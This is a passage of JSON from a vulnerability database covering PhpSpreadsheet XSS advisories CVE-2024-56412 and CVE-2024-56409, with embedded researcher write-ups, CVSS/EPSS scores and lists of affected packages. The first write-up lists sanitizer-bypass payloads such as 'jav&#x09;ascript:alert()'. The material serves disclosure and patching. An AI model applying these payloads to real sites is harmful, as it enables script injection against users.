ulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56410","GHSA-wv23-996v-q229"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ghv1-bdy8-hygk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56427?format=json","vulnerability_id":"VCID-m982-r6d1-c3bd","summary":"PhpSpreadsheet allows bypass XSS sanitizer using the javascript protocol and special characters\n# Bypass XSS sanitizer using the javascript protocol and special characters\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions**: a user viewing a specially generated Excel file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet.\n\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 6. Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can use special characters so that this library processes the javascript protocol with special characters and generates a HTML link.\nThe Excel file is unpacked and a hyperlink in the file is inserted into the `xl/worksheets/sheet1.xml` file.\n\n![fig11](https://github.com/user-attachments/assets/b9d53f7a-6f36-4853-95f9-8aa22f81eccd)\n\n*Figure 11. Using the javascript protocol with special characters*\n\nSome payloads help bypass the security system and carry out a XSS attack.\n\n*Listing 7. HTML form that demonstrates the exploitation of the XSS vulnerability*\n\n```\njav&#x09;ascript:alert()\njav&#x0D;ascript:alert()\njav&#x0A;ascript:alert()\n```\n\nIt's clear that the javascript protocol with special characters is used. \n\n![fig12](https://github.com/user-attachments/assets/7595e88b-9848-4251-845c-2c2d8032e479)\n\n*Figure 12. Using the javascript protocol with special characters*\n\nDue to the special characters, the execution stream ends up on line 1543, and the link is built in HTML form with the javascript protocol.\n\n<img width=\"373\" alt=\"fig13\" src=\"https://github.com/user-attachments/assets/3ca0c3c6-daa9-4502-ad9e-b803f308fd26\" />\n\n*Figure 13. Executing arbitrary JavaScript code*\n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56412","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54513","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54492","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54523","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56412"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:35:30Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56412","reference_id":"CVE-2024-56412","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56412"},{"reference_url":"https://github.com/advisories/GHSA-q9jv-mm3r-j47r","reference_id":"GHSA-q9jv-mm3r-j47r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q9jv-mm3r-j47r"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q9jv-mm3r-j47r","reference_id":"GHSA-q9jv-mm3r-j47r","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:35:30Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-q9jv-mm3r-j47r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56412","GHSA-q9jv-mm3r-j47r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m982-r6d1-c3bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56425?format=json","vulnerability_id":"VCID-qayz-3ufe-77ba","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file\n# Unauthorized Reflected XSS in `Currency.php` file\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` script, an attacker can perform XSS-type attack\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the `currency` variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Currency.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file, which leads to the possibility of a XSS attack.\nStrings are formed using the `currency` parameter without sanitization, controlled by an attacker.\n\n![fig9](https://github.com/user-attachments/assets/dfac3fbf-de42-42af-8163-b76f0c54da6c)\n\n*Figure 9.  A fragment of the query in which a string and a parameter are formed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 5. HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56409","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56409"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:14:44Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56409","reference_id":"CVE-2024-56409","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56409"},{"reference_url":"https://github.com/advisories/GHSA-j2xg-cjcx-4677","reference_id":"GHSA-j2xg-cjcx-4677","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j2xg-cjcx-4677"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-4677","reference_id":"GHSA-j2xg-cjcx-4677","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:14:44Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-j2xg-cjcx-4677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56409","GHSA-j2xg-cjcx-4677"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qayz-3ufe-77ba"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"}